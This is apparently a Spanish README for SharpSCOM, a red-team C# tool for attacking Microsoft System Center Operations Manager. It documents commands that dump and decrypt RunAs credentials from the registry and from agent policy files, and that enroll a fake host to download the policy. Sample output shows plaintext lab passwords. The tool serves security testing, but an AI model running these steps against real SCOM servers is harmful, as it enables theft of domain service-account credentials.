
Una utilidad en C# para interactuar con SCOM.
Una herramienta C# para interactuar con Microsoft System Center Operations Manager (SCOM).
Esta herramienta ha sido probada contra la versión 10.22.10118.0 del servidor SCOM.
La integración SSPI se proporciona a través de la librería nsspi de Kevin Thompson (antiduh), publicada bajo la licencia BSD-2.
█▀ █ █ ▄▀█ █▀█ █▀█ █▀ █▀▀ █▀█ █▀▄▀█
▄█ █▀█ █▀█ █▀▄ █▀▀ ▄█ █▄▄ █▄█ █ ▀ █
Author: Matt Johnson (@breakfix) - SpecterOps - v0.0.1
Usage: SharpSCOM <command> [options]
Commands:
RegisterAgent Register a new agent with SCOM server
RegisterCertificate Assign a certificate to an existing agent
RequestPolicy Request policy from SCOM server
DownloadPolicy Download policy from SCOM server
AutoEnroll Send a multi-part request consisting of RegisterAgent, RegisterCertificate and RequestPolicy and attempt to automatically download the policy
DecryptPolicy Decrypt SecureData section from a policy file
DecryptRunAs Extract and decrypt RunAs credentials from registry
Common Options:
/hostname:<name> Computer hostname (default: current machine)
/managementgroup:<mg> SCOM management group name
/server:<server> SCOM server address
/port:<port> SCOM server port (default: 5723)
/outfile:<file> Output file path
/data:<base64> Base64-encoded data
/key:<xml> RSA private key in XML format
/verbose Enable verbose output
/help Show this help message
Examples:
SharpSCOM AutoEnroll /managementgroup:MG1 /server:scom.domain.com
SharpSCOM DecryptPolicy /data:<base64> /outfile:policy.xml
SharpSCOM DecryptRunAs
Los siguientes comandos están diseñados para ejecutarse en un servidor que actualmente está registrado con SCOM. En caso de que las credenciales RunAs estén en uso y se hayan distribuido al servidor, podemos usar los siguientes comandos para recuperar las credenciales en texto plano.
Extrae y descifra las credenciales RunAs del registro (requiere privilegios de administrador local):
SharpSCOM.exe decryptrunas
█▀ █ █ ▄▀█ █▀█ █▀█ █▀ █▀▀ █▀█ █▀▄▀█
▄█ █▀█ █▀█ █▀▄ █▀▀ ▄█ █▄▄ █▄█ █ ▀ █
Author: Matt Johnson (@breakfix) - SpecterOps - v0.0.1
[+] Searching for RunAs credentials in registry...
[+] Found 4 credentials
Username: ludus\opsmgr_action
Password: Password123
Username: ludus\opsmgr_dataread
Password: Password123
Username: ludus\opsmgr_datawrite
Password: Password123
Username: ludus\runas_account
Password: SuperSecure!
[+] Completed
Extrae y descifra las credenciales RunAs almacenadas en la sección SecureData de un archivo XML de directiva de agente. Por defecto, se puede encontrar en C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\Connector Configuration Cache\$MANAGEMENT_GROUP_NAME$\OpsMgrConnector.Config
Este comando localizará el certificado SCOM RunAs actual en el almacén Local Machine\Microsoft Monitoring Agent y usará la clave privada asociada para el descifrado.
SharpSCOM DecryptPolicy /data:<base64-encrypted-data>
█▀ █ █ ▄▀█ █▀█ █▀█ █▀ █▀▀ █▀█ █▀▄▀█
▄█ █▀█ █▀█ █▀▄ █▀▀ ▄█ █▄▄ █▄█ █ ▀ █
Author: Matt Johnson (@breakfix) - SpecterOps - v0.0.1
[+] Attempting to decrypt policy data...
[+] Using certificate from store
[+] Found certificate in Microsoft Monitoring Agent store
[+] Subject: O=Microsoft, OU=RunAs Account Encryption, CN=scom-db.ludus.domain
[+] Issuer: O=Microsoft, OU=RunAs Account Encryption, CN=scom-db.ludus.domain
[+] Thumbprint: 88D3E2AC575795E5F5F0E0C2EAFFB5FC386EA52F
[+] Key Size: 2048
[+] RSA key loaded successfully from certificate
[+] SecureData decrypted successfully!
<SecureStorageContainer><SecureStorageReferences><Added><SecureStorageReference Identity="63745834-3e54-936c-1b47-2d632054a177"><TargetSSID>01020202020202020202020202020202020202020200000000000000000000000000000000000000</TargetSSID></SecureStorageReference></Added><Removed /><Modified /></SecureStorageReferences><SecureStorageElements><Added><SecureStorageElement Type="WindowsCredential"><SSID>00C29753F0583B2A1D9D0D81DF24F0FBA31D72B17A00000000000000000000000000000000000000</SSID><Domain>ludus</Domain><UserName>runas_account</UserName><Password>UwB1AHAAZQByAFMAZQBjAHUAcgBlACEA</Password></SecureStorageElement><SecureStorageElement Type="ActionAccountCredential"><SSID>01020202020202020202020202020202020202020200000000000000000000000000000000000000</SSID><Domain>NT Authority</Domain><UserName>LocalSystem</UserName></SecureStorageElement></Added><Removed /><Modified /></SecureStorageElements></SecureStorageContainer>
Si tenemos control de un host unido a un dominio que no está registrado actualmente con SCOM, podemos intentar registrar el dispositivo y solicitar un archivo XML de directiva de agente si se cumplen los siguientes requisitos.
Requisitos:
Para registrar un nuevo dispositivo, el agente SCOM enviará cada uno de los 4 mensajes siguientes al servidor SCOM.
| Comando | Descripción |
|---|---|
RegisterAgent | Registrar un nuevo agente con el servidor SCOM |
RegisterCertificate | Asignar un certificado a un agente existente |
RequestPolicy | Solicitar la directiva al servidor SCOM |
DownloadPolicy | Descargar la directiva del servidor SCOM |
Con fines de prueba, cada uno de los mensajes anteriores puede enviarse individualmente al servidor SCOM utilizando el comando correspondiente en SharpSCOM.
Nota: El servidor SCOM espera recibir estos mensajes juntos como parte de una solicitud de múltiples mensajes. Para recibir de forma fiable el archivo de directiva del agente, debemos usar el comando
AutoEnroll, que enviará los comandosRegisterAgent,RegisterCertificateyRequestPolicyjuntos como un mensaje multiparte.
Después de enviar el comando AutoEnroll, la respuesta del servidor SCOM se analizará automáticamente y se utilizará para generar el mensaje final DownloadPolicy y descargar el archivo XML de directiva del agente.
SharpSCOM.exe autoenroll /managementgroup:SCOM1 /server:scom-om1.ludus.domain /hostname:fake1.ludus.domain /outfile:C:\Users\domainadmin\desktop\policy_new.xml
█▀ █ █ ▄▀█ █▀█ █▀█ █▀ █▀▀ █▀█ █▀▄▀█
▄█ █▀█ █▀█ █▀▄ █▀▀ ▄█ █▄▄ █▄█ █ ▀ █
Author: Matt Johnson (@breakfix) - SpecterOps - v0.0.1